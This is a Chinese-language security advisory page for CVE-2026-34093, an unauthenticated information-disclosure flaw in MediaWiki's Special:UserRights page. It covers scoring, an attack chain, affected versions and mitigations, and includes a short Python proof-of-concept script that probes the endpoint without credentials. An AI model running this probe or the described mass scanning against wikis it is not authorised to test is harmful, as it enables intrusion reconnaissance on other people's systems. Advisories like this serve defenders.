CVE-2026-34093 CVSS 5.3 中危

CVE-2026-34093 MediaWiki敏感信息泄露漏洞

披露日期: 2026-05-11

来源: c4f26cc8-17ff-4c99-b5e2-38fc1793eacc

漏洞信息

漏洞编号

CVE-2026-34093

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

MediaWiki

漏洞概述

Wikimedia Foundation MediaWiki 中存在敏感信息泄露漏洞。该漏洞源于程序文件 includes/Specials/SpecialUserRights.Php 处理逻辑不当。未经授权的攻击者可利用此漏洞，在无需认证且无用户交互的情况下，通过网络远程获取部分敏感信息。受影响的版本包括 1.43.7、1.44.4 和 1.45.2 之前的所有版本，建议管理员及时采取修复措施。

技术细节

该漏洞位于 MediaWiki 的用户权限管理模块中，具体涉及 `includes/Specials/SpecialUserRights.php` 文件。由于该特定功能在处理用户权限变更或查询请求时，未对访问者身份进行严格的验证，导致未经身份验证的远程攻击者可以构造特定的 HTTP 请求访问受限页面。攻击者无需任何用户交互，即可利用此漏洞绕过访问控制机制。尽管 CVSS 评分显示机密性影响仅为低（C:L），但攻击者可能借此获取系统内部用户列表、特定用户组的权限分配情况或其他不应公开的配置信息。由于攻击向量为网络（AV:N）且复杂度低（AC:L），无需权限（PR:N），这使得漏洞利用门槛较低。攻击者可通过自动化脚本批量扫描受影响版本的服务器，进而为后续的定向攻击收集情报。

攻击链分析

STEP 1

侦察

攻击者通过网络扫描识别互联网上运行的 MediaWiki 实例，并确认其版本信息。

STEP 2

漏洞利用

攻击者向目标服务器发送特制的 HTTP GET 请求，直接访问 includes/Specials/SpecialUserRights.Php 对应的接口路径，且不携带任何认证凭证。

STEP 3

信息获取

由于缺乏权限校验，服务器返回包含用户权限或相关敏感信息的页面内容，攻击者解析响应数据以获取情报。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# POC for CVE-2026-34093
# This script attempts to access the SpecialUserRights page without authentication.
# If the server is vulnerable, it may return sensitive information.

def check_vulnerability(target_url):
    # Construct the path to the vulnerable endpoint
    exploit_path = "/index.php?title=Special:UserRights"
    full_url = target_url + exploit_path

    try:
        # Send a GET request without authentication headers
        response = requests.get(full_url, timeout=10)

        # Check if the response contains content indicating unauthorized access
        # (Adjust the check based on actual vulnerable response characteristics)
        if response.status_code == 200 and "User rights" in response.text:
            print("[+] Potential vulnerability detected! Information leaked.")
            return True
        else:
            print("[-] Target does not appear to be vulnerable or access is denied.")
            return False
    except Exception as e:
        print(f"[!] Error occurred: {e}")
        return False

# Example usage
if __name__ == "__main__":
    target = "http://example-mediawiki-site.com"
    check_vulnerability(target)

影响范围

MediaWiki < 1.43.7

MediaWiki < 1.44.4

MediaWiki < 1.45.2

防御指南

临时缓解措施

如果无法立即升级，建议通过服务器配置（如 .htaccess 或 Nginx 配置）限制对 `Special:UserRights` 页面的访问权限，仅允许管理员 IP 地址访问，或者暂时禁用该功能模块直至完成升级。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-34093
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-34093
3 Details https://www.cvedetails.com/cve/CVE-2026-34093/
4 VulDB https://vuldb.com/cve/CVE-2026-34093
5 Link https://phabricator.wikimedia.org/T414547

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表